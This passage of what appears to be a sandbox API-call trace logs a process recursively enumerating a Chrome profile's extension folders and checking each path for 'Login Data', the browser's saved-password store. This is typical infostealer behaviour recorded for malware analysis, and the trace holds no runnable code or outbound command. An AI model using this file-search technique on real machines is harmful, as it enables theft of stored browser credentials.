HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" [0161.618] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.618] GetProcessHeap () returned 0x8e0000 [0161.618] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.618] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json", lpSrch="Login Data") returned 0x0 [0161.618] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.618] GetProcessHeap () returned 0x8e0000 [0161.618] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.618] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.618] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.618] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.618] GetProcessHeap () returned 0x8e0000 [0161.618] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.618] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.618] GetProcessHeap () returned 0x8e0000 [0161.618] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.619] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sk", cAlternateFileName="")) returned 1 [0161.619] lstrcmpiW (lpString1="sk", lpString2=".") returned 1 [0161.619] lstrcmpiW (lpString1="sk", lpString2="..") returned 1 [0161.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.619] lstrlenW (lpString="\\") returned 1 [0161.619] GetProcessHeap () returned 0x8e0000 [0161.619] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.619] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.619] lstrlenW (lpString="sk") returned 2 [0161.619] GetProcessHeap () returned 0x8e0000 [0161.619] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.619] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0161.619] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.619] GetProcessHeap () returned 0x8e0000 [0161.619] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned 137 [0161.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned 137 [0161.619] lstrlenW (lpString="\\*.*") returned 4 [0161.619] GetProcessHeap () returned 0x8e0000 [0161.619] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0161.619] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*" [0161.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.619] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.619] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.620] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.620] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.620] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.620] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned 137 [0161.620] lstrlenW (lpString="\\") returned 1 [0161.620] GetProcessHeap () returned 0x8e0000 [0161.620] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0161.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\" [0161.620] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\") returned 138 [0161.620] lstrlenW (lpString="messages.json") returned 13 [0161.620] GetProcessHeap () returned 0x8e0000 [0161.620] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\" [0161.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" [0161.620] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.620] GetProcessHeap () returned 0x8e0000 [0161.620] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.620] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.620] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.620] GetProcessHeap () returned 0x8e0000 [0161.620] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.620] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.620] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.620] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.620] GetProcessHeap () returned 0x8e0000 [0161.620] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.620] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.620] GetProcessHeap () returned 0x8e0000 [0161.620] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.620] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sl", cAlternateFileName="")) returned 1 [0161.621] lstrcmpiW (lpString1="sl", lpString2=".") returned 1 [0161.621] lstrcmpiW (lpString1="sl", lpString2="..") returned 1 [0161.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.621] lstrlenW (lpString="\\") returned 1 [0161.621] GetProcessHeap () returned 0x8e0000 [0161.621] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.621] lstrlenW (lpString="sl") returned 2 [0161.621] GetProcessHeap () returned 0x8e0000 [0161.621] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0161.621] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.621] GetProcessHeap () returned 0x8e0000 [0161.621] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned 137 [0161.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned 137 [0161.621] lstrlenW (lpString="\\*.*") returned 4 [0161.621] GetProcessHeap () returned 0x8e0000 [0161.621] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0161.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*" [0161.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.622] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.622] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.622] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.622] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.622] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned 137 [0161.622] lstrlenW (lpString="\\") returned 1 [0161.622] GetProcessHeap () returned 0x8e0000 [0161.622] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" | out: 